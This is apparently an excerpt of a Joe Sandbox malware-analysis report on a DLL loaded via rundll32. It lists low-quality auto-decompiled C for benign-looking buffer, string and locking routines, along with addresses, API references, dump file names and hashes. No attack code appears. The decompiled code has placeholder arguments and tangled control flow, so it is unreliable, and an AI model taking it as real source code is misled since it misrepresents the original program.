				signed int _v52;
				intOrPtr _v56;
				intOrPtr _t50;
				signed int _t51;
				intOrPtr* _t60;
				intOrPtr* _t64;
				void* _t66;
				void* _t68;
				signed int _t69;
				intOrPtr _t77;
				intOrPtr* _t83;
				intOrPtr _t85;
				intOrPtr _t88;
				void* _t89;
				intOrPtr* _t94;

				_t70 = __ebx;
				_t73 = __ecx ^ __ecx;
				_v12 = __esi;
				_t88 = _a16;
				_v8 = __edi;
				_t77 = _a12;
				_v16 = __ebx;
				_v4 = __ebp;
				_v32 = __ecx ^ __ecx;
				_t85 =  *((intOrPtr*)(_t88 + 4));
				_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 0xc));
				if(_t50 == 0) {
					L2:
					 *_t94 = _t77;
					_t51 = L1001D990();
					_v32 = _t51;
					if(_t51 == 0) {
						goto L12;
					} else {
						_t70 =  *((intOrPtr*)(_t51 + 4));
						 *((intOrPtr*)(_t70 + 0x24)) = _a8;
						 *((intOrPtr*)(_t70 + 0x28)) =  *((intOrPtr*)(_t85 + 0x28));
						 *((intOrPtr*)(_t70 + 0x2c)) =  *((intOrPtr*)(_t85 + 0x2c));
						 *((intOrPtr*)(_t70 + 0x30)) =  *((intOrPtr*)(_t85 + 0x30));
						 *_t94 = _t88;
						_a12 = L10009FC0(_t70, _t73);
						_t60 =  *((intOrPtr*)(_t70 + 4));
						if( *((intOrPtr*)(_t60 + 0xc)) == 0) {
							_t89 = 0xfffffff4;
							goto L20;
						} else {
							 *(_t60 + 0x10) = _a20 & 0x0000000f;
							_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)))) + 0x58));
							if(_t83 == 0) {
								L15:
								_t64 =  *((intOrPtr*)( *_t60 + 0x54));
								if(_t64 == 0) {
									goto L7;
								} else {
									_v56 = _t85;
									 *_t94 = _t70;
									_v52 = _a20;
									_t66 =  *_t64();
									_t89 = _t66;
									if(_t66 == 0xffffffd8 || _t89 == 0) {
										goto L7;
									} else {
										goto L18;
									}
								}
							} else {
								_v56 = _t85;
								 *_t94 = _t70;
								_v52 = _a20;
								_t68 =  *_t83();
								_t89 = _t68;
								if(_t68 == 0xffffffd8) {
									_t60 =  *((intOrPtr*)(_t70 + 4));
									goto L15;
								} else {
									if(_t89 != 0) {
										L18:
										_t60 =  *((intOrPtr*)(_t70 + 4));
										L20:
										 *_t94 = _t60 + 0xc;
										E1000A000(_t70, _t89);
										goto L13;
									} else {
										L7:
										 *_a4 = _v32;
										goto L8;
									}
								}
							}
						}
					}
				} else {
					_t73 =  *(_t50 + 4);
					_t70 =  *((intOrPtr*)(_t77 + 4));
					if( *((intOrPtr*)( *(_t50 + 4) + 0xc)) ==  *((intOrPtr*)(_t77 + 4))) {
						 *_t94 = _t50;
						_t69 = L10009FC0(_t70, _t73);
						 *_a4 = _t69;
						if(_t69 != 0) {
							L8:
							_t89 = 0;
						} else {
							L12:
							_t89 = 0xfffffff4;
							L13:
							 *_t94 =  &_v32;
							E1000A000(_t70, _t89);
						}
					} else {
						goto L2;
					}
				}
				return _t89;
			}

0x1001e689
0x1001e693
0x1001e695
0x1001e699
0x1001e69d
0x1001e6a1
0x1001e6a5
0x1001e6a9
0x1001e6ad
0x1001e6b1
0x1001e6b7
0x1001e6bc
0x1001e6cd
0x1001e6cd
0x1001e6d0
0x1001e6d5
0x1001e6db
0x00000000
0x1001e6e1
0x1001e6e1
0x1001e6eb
0x1001e6f1
0x1001e6f7
0x1001e6fd
0x1001e700
0x1001e708
0x1001e70b
0x1001e713
0x1001e7e0
0x00000000
0x1001e719
0x1001e720
0x1001e728
0x1001e72d
0x1001e7ab
0x1001e7ad
0x1001e7b2
0x00000000
0x1001e7b4
0x1001e7b4
0x1001e7bc
0x1001e7bf
0x1001e7c3
0x1001e7c8
0x1001e7ca
0x00000000
0x00000000
0x00000000
0x00000000
0x1001e7ca
0x1001e72f
0x1001e72f
0x1001e737
0x1001e73a
0x1001e73e
0x1001e743
0x1001e745
0x1001e7a8
0x00000000
0x1001e747
0x1001e749
0x1001e7d8
0x1001e7d8
0x1001e7e5
0x1001e7e8
0x1001e7eb
0x00000000
0x1001e74f
0x1001e74f
0x1001e757
0x00000000
0x1001e757
0x1001e749
0x1001e745
0x1001e72d
0x1001e713
0x1001e6be
0x1001e6be
0x1001e6c1
0x1001e6c7
0x1001e778
0x1001e77b
0x1001e784
0x1001e788
0x1001e759
0x1001e759
0x1001e790
0x1001e790
0x1001e790
0x1001e795
0x1001e799
0x1001e79c
0x1001e79c
0x00000000
0x00000000
0x00000000
0x1001e6c7
0x1001e770

APIs

mv_hwframe_ctx_alloc.MAIN ref: 1001E6D0
mv_buffer_ref.MAIN ref: 1001E703
mv_buffer_ref.MAIN ref: 1001E77B
mv_buffer_unref.MAIN ref: 1001E79C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_ref$mv_buffer_unrefmv_hwframe_ctx_alloc
String ID:
API String ID: 2050485749-0
Opcode ID: dcc45be784228100b903491f3aa986d3d2d3c443bc532d0d1586efe615cdb925
Instruction ID: 8b6b2c4b9edff8b5b994b7bafb8a9cba886c6cdf0ee15f0dc382da97d3216468
Opcode Fuzzy Hash: dcc45be784228100b903491f3aa986d3d2d3c443bc532d0d1586efe615cdb925
Instruction Fuzzy Hash: 7E417079A087518FD744DF29C18091AFBE1FF89350F568A6DE8989B395D730EC81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 100A1540 Relevance: 7.6, APIs: 5, Instructions: 102threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 100A1580

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: aad5760cf48bfe59ace8456a0545fe3771cbea0c5a493778d31e095d93af85e1
Instruction ID: a603e3a71963cb926592ecdf01b935e1f93b8b32596d5f9433372c4bec14c4a6
Opcode Fuzzy Hash: aad5760cf48bfe59ace8456a0545fe3771cbea0c5a493778d31e095d93af85e1
Instruction Fuzzy Hash: AD31AE75B04612CBDB00EFA8C98439A77E5EBC03E0F598579E8598F249EA75CC40CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 1000A480 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

mv_mallocz.MAIN ref: 1000A4BA
mv_freep.MAIN ref: 1000A4E8
mv_freep.MAIN ref: 1000A541

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_mallocz
String ID:
API String ID: 2455733640-0
Opcode ID: 9f74527f40638788ac7371101fbd516078908c2a159fba3966d1ad274412a250
Instruction ID: 7473898efd5c84ff4cba6f3e963b26fd6c8cdcec3b0c7db7706523d113c4544c
Opcode Fuzzy Hash: 9f74527f40638788ac7371101fbd516078908c2a159fba3966d1ad274412a250
Instruction Fuzzy Hash: 2B31D074904B11CFD760DF25C88191AB7E0FF89391B168A5DEC999B719E730E880CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10012049 Relevance: 7.6, APIs: 5, Instructions: 79
stringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10012049(signed int __ebx, void* __ecx, void* __edx) {
				signed int* _t142;
				void* _t152;
				void* _t154;
				signed int* _t155;
				int _t157;
				signed int _t159;
				signed int _t165;
				int _t173;
				void* _t175;
				void* _t178;
				signed int _t179;
				void** _t180;
				void* _t183;
				signed int _t190;
				void** _t191;
				void* _t192;
				signed char _t195;
				void* _t208;
				void* _t210;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				signed int _t221;
				int _t223;
				void* _t224;
				void* _t230;
				void* _t232;
				int _t234;
				int _t236;
				void* _t237;
				void* _t239;
				void* _t241;
				signed int* _t243;
				void** _t246;

				_t210 = __edx;
				_t179 = __ebx;
				while(1) {
					L42:
					 *_t246 = _t192;
					_t246[0x19] = _t210;
					_t246[9] = _t192;
					_t236 = strlen(??);
					 *_t246 = _t246[8];
					_t173 = strlen(??);
					 *_t246 = _t246[9];
					_t223 = _t173;
					_t84 = _t173 + 1; // 0x1
					_t246[1] = _t236 + _t84;
					_t175 = E10026280();
					if(_t175 == 0) {
						break;
					}
					_t86 = _t223 + 1; // 0x1
					_t246[8] = _t86;
					_t214 = _t175 + _t236;
					_t237 = _t246[0xf];
					_t195 = _t214;
					_t246[0xb] = _t214;
					_t246[9] = _t214;
					_t215 = _t246[0x19];
					_t246[0xa] = _t237;
					if(_t246[8] >= 8) {
						if((_t195 & 0x00000001) != 0) {
							 *(_t246[0xb]) =  *_t237 & 0x000000ff;
							_t246[8] = _t223;
							_t246[9] = _t246[9] + 1;
							_t246[0xa] = _t246[0xa] + 1;
						}
						if((_t246[9] & 0x00000002) != 0) {
							_t239 = _t246[0xa];
							_t224 = _t246[9];
							 *_t224 =  *_t239 & 0x0000ffff;
							_t246[9] = _t224 + 2;
							_t246[8] = _t246[8] - 2;
							_t246[0xa] = _t239 + 2;
						}
						if((_t246[9] & 0x00000004) != 0) {
							_t241 = _t246[0xa];
							_t208 = _t246[9] + 4;
							 *(_t208 - 4) =  *_t241;
							_t246[9] = _t208;
							_t246[8] = _t246[8] - 4;
							_t246[0xa] = _t241 + 4;
						}
					}
					_t246[0x19] = _t215;
					_t246[0xb] = _t175;
					memcpy(_t246[9], _t246[0xa], _t246[8]);
					_t246 =  &(_t246[3]);
					 *_t246 =  &(_t246[0xf]);
					E100265C0();
					_t212 = _t246[0x19];
					_t246[0xf] = _t246[0xb];
					goto L18;
					while(1) {
						L19:
						_t234 = _t246[0xf];
						if(_t234 == 0) {
							goto L39;
						}
						L20:
						_t191 = _t190 + _t159 * 8;
						_t191[1] = _t234;
						 *_t191 = _t246[0xe];
						 *_t243 = _t159 + 1;
						while(1) {
							L21:
							_t179 = (_t180 -  *((intOrPtr*)(_t210 + 4)) >> 3) + 1;
							if( *_t210 <= _t179) {
								break;
							}
							_t180 =  *((intOrPtr*)(_t210 + 4)) + _t179 * 8;
							if(_t180 == 0) {
								break;
							} else {
								_t230 =  *_t180;
								_t246[0xe] = 0;
								_t217 = _t180[1];
								_t243 =  *(_t246[0x18]);
								_t246[0xf] = 0;
								if(_t246[5] == 0) {
									if(_t217 == 0) {
										goto L4;
									} else {
										 *_t246 = _t217;
										_t246[0x19] = _t210;
										_t178 = E100267C0(_t180, _t217, _t230, _t243);
										_t210 = _t246[0x19];
										_t246[0xf] = _t178;
										if(_t230 != 0) {
											goto L5;
										} else {
											goto L25;
										}
									}
								} else {
									_t246[0xf] = _t217;
									L4:
									if(_t230 == 0) {
										L25:
										_t142 = _t243;
										_t183 = 0xffffffea;
										goto L26;
									} else {
										L5:
										_t246[4] = 0;
										if(_t246[6] == 0) {
											_t246[1] = _t230;
											 *_t246 = _t243;
											_t246[0x19] = _t210;
											_t246[3] = _t246[0x1a];
											_t246[2] = 0;
											_t152 = E100110D0();
											_t210 = _t246[0x19];
											_t246[4] = _t152;
										}
										if(_t246[7] == 0) {
											 *_t246 = _t230;
											_t246[0x19] = _t210;
											_t154 = E100267C0(_t180, _t217, _t230, _t243);
											_t210 = _t246[0x19];
											_t246[0xe] = _t154;
											_t232 = _t154;
											if(_t243 == 0) {
												goto L33;
											} else {
												if(_t154 == 0) {
													goto L10;
												} else {
													goto L8;
												}
											}
										} else {
											_t246[0xe] = _t230;
											if(_t243 == 0) {
												L33:
												 *_t246 = 8;
												_t246[0x19] = _t210;
												_t155 = E100265E0();
												_t232 = _t246[0xe];
												_t243 = _t155;
												 *(_t246[0x18]) = _t243;
												if(_t243 == 0) {
													L35:
													_t142 = _t243;
													_t183 = 0xfffffff4;
													L26:
													if(_t142 != 0) {
														L11:
														if( *_t142 == 0) {
															 *_t246 =  &(_t142[1]);
															E100265C0();
															 *_t246 = _t246[0x18];
															E100265C0();
														}
													}
													 *_t246 = _t246[0xe];
													L100265B0();
													 *_t246 = _t246[0xf];
													L100265B0();
													return _t183;
												} else {
													_t210 = _t246[0x19];
													if(_t232 != 0) {
														goto L8;
													} else {
														goto L35;
													}
												}
											} else {
												L8:
												_t157 = _t246[0xf];
												_t246[8] = _t157;
												if(_t217 == 0 || _t157 != 0) {
													if(_t246[4] == 0) {
														_t159 =  *_t243;
														if(_t246[8] == 0) {
															goto L39;
														} else {
															_t246[0x19] = _t210;
															_t246[2] = 8;
															_t246[1] = _t159 + 1;
															 *_t246 = _t243[1];
															_t165 = E100264F0();
															_t210 = _t246[0x19];
															_t190 = _t165;
															if(_t165 == 0) {
																goto L10;
															} else {
																_t243[1] = _t165;
																_t159 =  *_t243;
																goto L19;
															}
														}
													} else {
														if((_t246[0x1a] & 0x00000010) != 0) {
															 *_t246 = _t232;
															_t246[0x19] = _t210;
															L100265B0();
															 *_t246 = _t246[0xf];
															L100265B0();
															_t210 = _t246[0x19];
															continue;
														} else {
															_t192 =  *(_t246[4] + 4);
															if(_t246[8] == 0 || (_t246[0x1a] & 0x00000020) == 0) {
																 *_t246 = _t192;
																_t246[0x19] = _t210;
																L100265B0();
																_t212 = _t246[0x19];
																L18:
																_t246[0x19] = _t212;
																 *_t246 =  *(_t246[4]);
																L100265B0();
																_t221 =  *_t243;
																_t190 = _t243[1];
																_t213 = _t246[4];
																_t34 = _t221 - 1; // 0x3
																_t159 = _t34;
																 *_t243 = _t159;
																 *_t213 =  *(_t190 + _t159 * 8);
																 *((intOrPtr*)(_t213 + 4)) =  *((intOrPtr*)(_t190 + 4 + _t159 * 8));
																_t210 = _t246[0x19];
																L19:
																_t234 = _t246[0xf];
																if(_t234 == 0) {
																	goto L39;
																}
																continue;
															} else {
																goto L42;
															}
														}
													}
												} else {
													goto L10;
												}
											}
										}
									}
								}
							}
							L52:
						}
						return 0;
						goto L52;
						L39:
						if(_t159 == 0) {
							_t246[0x19] = _t210;
							 *_t246 =  &(_t243[1]);
							E100265C0();
							 *_t246 = _t246[0x18];
							E100265C0();
							_t210 = _t246[0x19];
						}
						_t246[0x19] = _t210;
						 *_t246 =  &(_t246[0xe]);
						E100265C0();
						_t210 = _t246[0x19];
						goto L21;
					}
				}
				L10:
				_t142 = _t243;
				_t183 = 0xfffffff4;
				goto L11;
			}

0x10012049
0x10012049
0x10012050
0x10012050
0x10012050
0x10012053
0x10012057
0x10012060
0x10012066
0x10012069
0x10012072
0x10012075
0x10012077
0x1001207b
0x1001207f
0x10012086
0x00000000
0x00000000
0x1001208c
0x1001208f
0x10012093
0x10012096
0x1001209f
0x100120a1
0x100120a5
0x100120a9
0x100120ad
0x100120b1
0x1001211b
0x10012157
0x10012159
0x10012162
0x1001216b
0x1001216b
0x10012122
0x10012171
0x10012175
0x1001217c
0x10012182
0x10012189
0x1001218e
0x1001218e
0x10012129
0x1001212b
0x10012135
0x10012138
0x1001213b
0x10012142
0x10012147
0x10012147
0x10012129
0x100120b3
0x100120bb
0x100120c7
0x100120c7
0x100120cd
0x100120d0
0x100120d9
0x100120dd
0x100120e1
0x10011e83
0x10011e83
0x10011e83
0x10011e89
0x00000000
0x00000000
0x10011e8f
0x10011e93
0x10011e97
0x10011e9a
0x10011e9c
0x10011e9f
0x10011e9f
0x10011ea7
0x10011eaa
0x00000000
0x00000000
0x10011d63
0x10011d68
0x00000000
0x10011d6e
0x10011d74
0x10011d76
0x10011d7a
0x10011d7d
0x10011d81
0x10011d8b
0x10011ec2
0x00000000
0x10011ec8
0x10011ec8
0x10011ecb
0x10011ecf
0x10011ed6
0x10011eda
0x10011ede
0x00000000
0x00000000
0x00000000
0x00000000
0x10011ede
0x10011d91
0x10011d91
0x10011d95
0x10011d97
0x10011ee4
0x10011ee4
0x10011ee6
0x00000000
0x10011d9d
0x10011d9d
0x10011d9f
0x10011da9
0x10011f30
0x10011f38
0x10011f3b
0x10011f3f
0x10011f45
0x10011f49
0x10011f4e
0x10011f52
0x10011f52
0x10011db5
0x10011f00
0x10011f03
0x10011f07
0x10011f0e
0x10011f12
0x10011f16
0x10011f18
0x00000000
0x10011f1a
0x10011f1c
0x00000000
0x10011f22
0x00000000
0x10011f22
0x10011f1c
0x10011dbb
0x10011dbb
0x10011dc1
0x10011f80
0x10011f80
0x10011f87
0x10011f8b
0x10011f90
0x10011f94
0x10011f9c
0x10011f9e
0x10011fac
0x10011fac
0x10011fae
0x10011eeb
0x10011eed
0x10011dde
0x10011de2
0x10011f63
0x10011f66
0x10011f6f
0x10011f72
0x10011f72
0x10011de2
0x10011dec
0x10011def
0x10011df8
0x10011dfb
0x10011e09
0x10011fa0
0x10011fa2
0x10011fa6
0x00000000
0x00000000
0x00000000
0x00000000
0x10011fa6
0x10011dc7
0x10011dc7
0x10011dc7
0x10011dcd
0x10011dd1
0x10011e16
0x10011fc4
0x10011fc9
0x00000000
0x10011fcb
0x10011fcb
0x10011fd5
0x10011fd9
0x10011fe0
0x10011fe3
0x10011fe8
0x10011fee
0x10011ff0
0x00000000
0x10011ff6
0x10011ff6
0x10011ff9
0x00000000
0x10011ff9
0x10011ff0
0x10011e1c
0x10011e21
0x100120f0
0x100120f3
0x100120f7
0x10012100
0x10012103
0x10012108
0x00000000
0x10011e27
0x10011e31
0x10011e34
0x10011e41
0x10011e44
0x10011e48
0x10011e4d
0x10011e51
0x10011e51
0x10011e5b
0x10011e5e
0x10011e63
0x10011e66
0x10011e69
0x10011e6d
0x10011e6d
0x10011e70
0x10011e7a
0x10011e7c
0x10011e7f
0x10011e83
0x10011e83
0x10011e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10011e34
0x10011e21
0x00000000
0x00000000
0x00000000
0x10011dd1
0x10011dc1
0x10011db5
0x10011d97
0x10011d8b
0x00000000
0x10011d68
0x10011ebb
0x00000000
0x10012008
0x1001200a
0x10012028
0x1001202f
0x10012032
0x1001203b
0x1001203e
0x10012043
0x10012043
0x1001200c
0x10012014
0x10012017
0x1001201c
0x00000000
0x1001201c
0x10011e83
0x10011dd7
0x10011dd7
0x10011dd9
0x00000000

APIs

strlen.MSVCRT ref: 1001205B
strlen.MSVCRT ref: 10012069
mv_realloc.MAIN ref: 1001207F

Part of subcall function 10026280: _aligned_realloc.MSVCRT ref: 100262AB

mv_freep.MAIN ref: 100120D0

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$_aligned_reallocmv_freepmv_realloc
String ID:
API String ID: 895301365-0
Opcode ID: 0c29223b98c086e2b46ad98e7ce3030191046c0ef949241b854c2fd3e23e1c87
Instruction ID: 2d1e53f319068be23ad8f88d31967b5a2669bada8836d01dcbd6984a06f05035
Opcode Fuzzy Hash: 0c29223b98c086e2b46ad98e7ce3030191046c0ef949241b854c2fd3e23e1c87
Instruction Fuzzy Hash: 6131BDB99087018FC744CF29C18045AFBE1FF88718F158A6EE889AB311E731E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A650 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1000A66C
mv_freep.MAIN ref: 1000A69C
ReleaseSRWLockExclusive.KERNEL32 ref: 1000A6AB

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireReleasemv_freep
String ID:
API String ID: 2444013405-0
Opcode ID: 69b2e29afcab2b062c2147764c90657bebc76e2e75c4088fc9dd16b63d4a40d8
Instruction ID: 7158096d1edc9a63a07daa50029a30cfeb496985ca544081e00db1e7d26d72ff
Opcode Fuzzy Hash: 69b2e29afcab2b062c2147764c90657bebc76e2e75c4088fc9dd16b63d4a40d8
Instruction Fuzzy Hash: 3421DBB5604701CFD704EF25D5C591ABBF4FF89280F06C969E8898B31AE731E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10012239 Relevance: 7.6, APIs: 5, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E10012239(intOrPtr __edi, intOrPtr* __esi, char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a40, char _a44, char _a61, char _a64, intOrPtr* _a1120, intOrPtr _a1124) {
				signed int _t34;
				char* _t49;
				intOrPtr* _t51;
				intOrPtr _t56;
				void* _t57;
				intOrPtr* _t60;
				char* _t64;
				intOrPtr* _t66;

				_t60 = __esi;
				_t56 = __edi;
				_a8 = 0xffffffff;
				_t49 =  &_a64;
				_a4 = 0x40;
				_t64 =  &_a61;
				 *_t66 = _t49;
				E10008880(_t49, __edi, __esi, _t64);
				_t34 = 0;
				_t51 = _t60;
				_a1124 = _t56;
				_t57 = 0;
				if( *_t51 > 0) {
					while(1) {
						_t60 =  *((intOrPtr*)(_t51 + 4)) + _t34 * 8;
						if(_t60 == 0) {
							goto L5;
						}
						if(_t57 != 0) {
							 *_t66 = _t49;
							_a8 = 1;
							_a4 =  &_a40;
							_a1120 = _t51;
							L10008F30();
							_t51 = _a1120;
						}
						_a8 = _t64;
						_a12 = 1;
						_t57 = _t57 + 1;
						_a16 = 0;
						_a1120 = _t51;
						 *_t66 = _t49;
						_a4 =  *_t60;
						E10009730();
						_a8 = 1;
						_a4 =  &_a44;
						 *_t66 = _t49;
						L10008F30();
						_a16 = 0;
						_a12 = 1;
						_a8 = _t64;
						 *_t66 = _t49;
						_a4 =  *((intOrPtr*)(_t60 + 4));
						E10009730();
						_t51 = _a1120;
						_t34 = _t60 + 1;
						if( *_t51 > _t34) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				 *_t66 = _t49;
				_a4 = _a1124;
				return E10009690(_t49, _t51, _a1124, _t60);
			}

0x10012239
0x10012239
0x1001224a
0x1001224e
0x10012252
0x10012256
0x1001225a
0x1001225d
0x10012262
0x10012264
0x10012266
0x10012271
0x10012273
0x10012279
0x1001227c
0x10012281
0x00000000
0x00000000
0x10012289
0x10012330
0x10012338
0x10012340
0x10012344
0x1001234b
0x10012350
0x10012350
0x1001228f
0x1001229a
0x1001229e
0x1001229f
0x100122a3
0x100122ac
0x100122af
0x100122b3
0x100122c1
0x100122c5
0x100122c9
0x100122cc
0x100122d3
0x100122dc
0x100122e0
0x100122e7
0x100122ea
0x100122ee
0x100122f3
0x10012302
0x10012307
0x00000000
0x00000000
0x00000000
0x10012307
0x10012279
0x1001230d
0x1001230d
0x10012317
0x1001232a

APIs

mv_bprint_init.MAIN ref: 1001225D
mv_bprint_escape.MAIN ref: 100122B3
mv_bprint_append_data.MAIN ref: 100122CC
mv_bprint_escape.MAIN ref: 100122EE
mv_bprint_finalize.MAIN ref: 1001231B
mv_bprint_append_data.MAIN ref: 1001234B

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprint_init
String ID:
API String ID: 3283265872-0
Opcode ID: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
Instruction ID: 90910876c942d1fbafe524e13dc9732c176e9ecd8d18a9c8de127334b5e1fd1f
Opcode Fuzzy Hash: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
Instruction Fuzzy Hash: 6121DDB59197059FC350DF28C18025AFBE1FF88354F51892EE99D87351E736E982CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10011483 Relevance: 7.6, APIs: 5, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E10011483(void* __eax, intOrPtr* __ebx, void* __ecx, void* __eflags) {
				intOrPtr* _t60;

				 *__esp = __eax;
				__edi = __eax;
				__esp[7] = __ecx;
				__eax = strlen(??);
				__ecx = __esp[7];
				 *__esp = __esp[7];
				__esi = __eax;
				__eax = strlen(??);
				 *__esp = __edi;
				__edx = __eax;
				__esp[7] = __eax;
				_t26 = __eax + 1; // 0x1
				__eax = __esi + _t26;
				__esp[1] = __esi + _t26;
				__eax = E10026280();
				if(__eax != 0) {
					__edx = __esp[7];
					__edi = __eax + __esi;
